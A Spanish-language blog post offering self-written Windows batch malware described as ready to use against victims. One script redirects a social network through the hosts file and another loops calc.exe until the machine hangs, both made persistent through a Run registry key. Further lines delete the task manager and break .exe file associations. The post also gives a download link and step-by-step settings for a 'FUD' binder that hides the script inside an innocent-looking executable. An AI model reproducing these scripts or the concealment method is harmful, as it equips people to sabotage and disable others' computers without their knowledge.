Buenas! Como algunos sabreis la programación es algo más común cada dia. Hay diversos lenguajes según lo que se quiera construir, cómo, y la finalidad que le queramos dar. Hoy os voy a hablar del BATCH, un lenguaje de programación muy simple, y por esto mismo es utilizado para hacer virus informáticos, aplicaciones diversas con funciones limitadas, etc. Para más información os dejo el enlace a un manual básico sobre BATCH para el que quiera hacerse sus primeros pinitos en el mundo de la programación.

http://foro.portalhacker.net/index.php/topic,45625.0.html

Ahora os dejo también algunos ejemplos propios, todos códigos maliciosos listos para usar, sin testeo, pero que no tienen ningún error a primera vista:

@echo off
cd "c:/windows/system32/drivers/etc"
del c:/windows/system32/drivers/etc/hosts.ics
echo # Copyright (c) 1993-2001 Microsoft Corp.>>hosts.ics
echo #>>hosts.ics
echo # This file has been automatically generated for use by Microsoft Internet>>hosts.ics
echo # Connection Sharing. It contains the mappings of IP addresses to host names>>hosts.ics
echo # for the home network. Please do not make changes to the HOSTS.ICS file.>>hosts.ics
echo # Any changes may result in a loss of connectivity between machines on the>>hosts.ics
echo # local network.>>hosts.ics
echo #>>hosts.ics
echo 209.222.138.10 www.tuenti.com>>hosts.ics
if not exist c:\SystemI\windirect.bat goto crear else goto exit
:crear
MKDIR c:\SystemI
copy %0 "c:\SystemI\winredirect.bat"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsNetServ /d "c:\SystemI\winredirect.bat"
:exit
exit

Este código impedirá al usuario entrar a la red social tuenti, y si lograra encontrar la manera de arreglarlo, en cada reinicio del ordenador se le volveria a modificar el archivo que le impide el acceso, toda una jodienda buena para los tuentiadictos que saben hacer click y poco más.

@echo off
MKDIR c:\SystemO
cd "c:\SystemO"
echo @echo off>>windk.bat
echo :bucle>>windk.bat
echo start calc.exe>>windk.bat
echo goto bucle>>windk.bat
echo exit>>windk.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsNetServ /d "c:\SystemO\windk.bat"
pause
exit

Este creará un directorio llamado SystemO, y en él, un archivo llamado windk.bat, que contendrá un bucle para abrir la calculadora constantemente hasta que la memoria no pueda más y el ordenador se quede pillado. El truco está en que modificamos el registro de windows para hacer que nuestro bucle se ejecute en cada reinicio de windows.

Estos códigos están bien, no son nada del otro mundo, pero no estan mal para hacerle a más de uno la vida un poco más dificil, o hacerle formatear el pc. De todas maneras ambos se podrian mejorar para molestar más a la victima añadiendo lineas como:

del C:\WINDOWS\System32\tskmngr.exe

o

assoc .exe==jpegfile

La primera elimina el Administrador de tareas para que no se pueda ejecutar, y el segundo asocia la extensión .exe a jpegfile, con lo cual hace que no se puedan abrir los .exe a menos que se invierta esta asociación.

A pesar de tener estos códigos o saber hacerlos, lo realmente dificil viene a la hora de colarselo a quien pongamos en nuestro punto de mira, cualquier canelo aceptaria cualquier cosa y la ejecutaria, pero hay gente que tiene más de media neurona, y no pica tan facilmente...

Aquí os presento la solución, se trata de un blinder, un programa que ocultará nuestro codigo ".bat" en un .exe, y al que podremos añadir otros programas o imagenes para hacer que se muestren primero, para que nuestro codigo malicioso se ejecute ocultamente, y podamos hacer la trastada de una forma más disimulada.

http://rapidshare.com/files/232771414/FUD_binden.zip
Password: undetecter.net
(Créditos para sn0x. de portalhacker.net)

Al abrirlo nos encontraremos con "Batch file", aqui buscaremos nuestro codigo con la extensión .bat. Después en "Save as" elegiremos dónde se compilará nuestro archivo y qué nombre llevará. Los parámetros ideales son marcar "Invisible aplication", "Temporary directory", "Do not delete" y "Add Vista administrator manifest". En la pestaña include es donde incluiremos los archivos que acompañarán a nuestro .bat. Y en Versioninformations podremos añadir detalles al archivo y cambiarle el icono.

También podremos usar un programa llamado SFX Compiler, del cual daré una explicación y link de descarga más adelante si se demanda.

Un saludo!

Me complace daros la bienvenida, usuarios de blogspot y demás visitantes, al blog Made In Profane, hecho a partir de la plantilla Live Cycle de la web btemplates.com y con imágenes hechas desde 0 con Photoshop CS2.

El Blog aun no tiene función específica, aunque si se tiene en mente cual va a ser, y se está preparando material para que la inauguración real esté repleta de utilidades y demás información.